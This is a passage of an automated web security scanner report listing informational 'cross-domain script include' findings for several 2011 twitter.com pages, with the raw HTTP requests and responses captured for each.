X-Runtime: 0.01607
Content-Type: text/html; charset=utf-8
Content-Length: 44586
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzciCmZsYXNoSUM6J0FjdGlvbkNvbnRy%250Ab2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6B2lkIiUwZWU5%250AYmE5M2IzN2U4M2Y4NTU1ODc1MGJjZTQ2Y2E4OToVaW5fbmV3X3VzZXJfZmxv%250AdzA%253D--5d5e0cde97546ff3bb3adffea964a59e2e281451; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.331. http://twitter.com/sp_arizona previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sp_arizona

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /sp_arizona HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:28:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664123-78656-32322
ETag: "02c631e9215a2f3644555561c69e0419"
Last-Modified: Wed, 02 Feb 2011 16:28:43 GMT
X-Runtime: 0.00745
Content-Type: text/html; charset=utf-8
Content-Length: 59926
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.332. http://twitter.com/sp_arizona previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sp_arizona

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758
http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758
http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758
http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /sp_arizona HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570797-74858-25074
ETag: "af94f4598d9ba4dc824eed21cf28130c"
Last-Modified: Tue, 01 Feb 2011 14:33:17 GMT
X-Runtime: 0.01041
Content-Type: text/html; charset=utf-8
Content-Length: 59892
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570797191212; path=/; expires=Tue, 08-Feb-11 14:33:17 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657079719886226; path=/; expires=Thu, 03 Mar 2011 14:33:17 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTdkN2FlNWM5N2ZiNDExYmMwMzUxZDk0N2E3NTNjZWI4Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIkEyk4S0B--3dc48e749df60de049063cbf90ad7fc867311bc5; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/twitter.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527758" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527758" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/geov1.js?1296527758" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/api.js?1296527758" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527758" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/dismissable.js?1296527758" type="text/javascript"></script>
...[SNIP]...

18.333. http://twitter.com/sp_oregon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sp_oregon

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527186
http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527186
http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186
http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296527186
http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296527186
http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296527186
http://a3.twimg.com/a/1296525272/javascripts/api.js?1296527186
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /sp_oregon HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:16 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570796-41787-44598
ETag: "9062b69bb373471eebcb428cbc672264"
Last-Modified: Tue, 01 Feb 2011 14:33:16 GMT
X-Runtime: 0.01675
Content-Type: text/html; charset=utf-8
Content-Length: 59349
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570796952504; path=/; expires=Tue, 08-Feb-11 14:33:16 GMT; domain=.twitter.com
Set-Cookie: guest_id=12965707969606832; path=/; expires=Thu, 03 Mar 2011 14:33:16 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTg4M2FlMWU1YTdjODcyZDAwZjNmMDYzNDM3NTg4NjYzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIo0uk4S0B--8c1cd526ce98f4b9a27c95f038357bd12cd59e4e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/twitter.js?1296527186" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296527186" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296527186" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/geov1.js?1296527186" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/api.js?1296527186" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296527186" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/dismissable.js?1296527186" type="text/javascript"></script>
...[SNIP]...

18.334. http://twitter.com/sp_oregon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sp_oregon

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /sp_oregon HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:28:31 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664111-49482-52001
ETag: "152e514a08edf2182751bbfbf31cabba"
Last-Modified: Wed, 02 Feb 2011 16:28:31 GMT
X-Runtime: 0.01332
Content-Type: text/html; charset=utf-8
Content-Length: 59312
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745" type="text/javascript"></script>
...[SNIP]...

18.335. http://twitter.com/sp_tx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sp_tx

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487
http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487
http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487
http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /sp_tx HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=4bfz%2B%2BmebEkRkMWFCXm%2FCUOsvDoVeFTl; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; auth_token=; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwOgdp%250AZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNhODkiCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7BjoLbm90aWNl%250AMAY6CkB1c2VkewY7ClQ%253D--5a2e49e97d480d46a9c20e3da4ca89031ded8efb; __utmc=43838368; __utmb=43838368.3.10.1296663641; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:28:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664129-4781-17969
ETag: "91a14ff7c3493dc5bed5b8fae9a22a18"
Last-Modified: Wed, 02 Feb 2011 16:28:49 GMT
X-Runtime: 0.00758
Content-Type: text/html; charset=utf-8
Content-Length: 59220
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/twitter.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296614487" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296614487" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/geov1.js?1296614487" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296609216/javascripts/api.js?1296614487" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296614487" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296609216/javascripts/dismissable.js?1296614487" type="text/javascript"></script>
...[SNIP]...

18.336. http://twitter.com/sp_tx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/sp_tx

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560
http://a0.twimg.com/a/1296525272/javascripts/twitter.js?1296526560
http://a1.twimg.com/a/1296525272/javascripts/dismissable.js?1296526560
http://a1.twimg.com/a/1296525272/javascripts/geov1.js?1296526560
http://a2.twimg.com/a/1296525272/javascripts/api.js?1296526560
http://a3.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296526560
http://a3.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296526560
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

GET /sp_tx HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 01 Feb 2011 14:33:17 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296570797-19223-29726
ETag: "19fc33eaf2857f18250f64d34c8288b5"
Last-Modified: Tue, 01 Feb 2011 14:33:17 GMT
X-Runtime: 0.01270
Content-Type: text/html; charset=utf-8
Content-Length: 59123
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296570797643297; path=/; expires=Tue, 08-Feb-11 14:33:17 GMT; domain=.twitter.com
Set-Cookie: guest_id=129657079765322715; path=/; expires=Thu, 03 Mar 2011 14:33:17 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTVkYzQ0Nzg5MDIxYmYxZjJhODhiMWI5ODRkMmYyMTJlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIV06k4S0B--5f18d466d1bff4879062521feb9e994bd7aaf156; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/twitter.js?1296526560" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/lib/jquery.tipsy.min.js?1296526560" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296525272/javascripts/lib/gears_init.js?1296526560" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/geov1.js?1296526560" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296525272/javascripts/api.js?1296526560" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296525272/javascripts/lib/mustache.js?1296526560" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296525272/javascripts/dismissable.js?1296526560" type="text/javascript"></script>
...[SNIP]...

18.337. http://twitter.com/toptweets/favorites previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/toptweets/favorites

Issue detail

The response dynamically includes the following scripts from other domains:

http://a0.twimg.com/a/1296609216/javascripts/lib/mustache.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/dismissable.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/geov1.js?1296611745
http://a1.twimg.com/a/1296609216/javascripts/twitter.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/api.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/gears_init.js?1296611745
http://a3.twimg.com/a/1296609216/javascripts/lib/jquery.tipsy.min.js?1296611745
http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
http://www.google.com/jsapi

Request

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 16:31:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296664298-2828-7354
ETag: "7249bed2734938c6018000a190afe33a"
Last-Modified: Wed, 02 Feb 2011 16:31:38 GMT
X-Runtime: 0.65005
Content-Type: text/html; charset=utf-8
Content-Length: 45692
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCPJPud4tAToMY3NyZl9pZCIlZmM1MjY1NTU4%250AZjcyOWZjODA5MTJiYTUwZWE4ZDlhMzc6FWluX25ld191c2VyX2Zsb3cwIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOgdpZCIlMGVlOWJhOTNiMzdlODNmODU1NTg3NTBiY2U0NmNh%250AODk%253D--bba436ff6544a757e8daffd78a6aea9727118972; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>

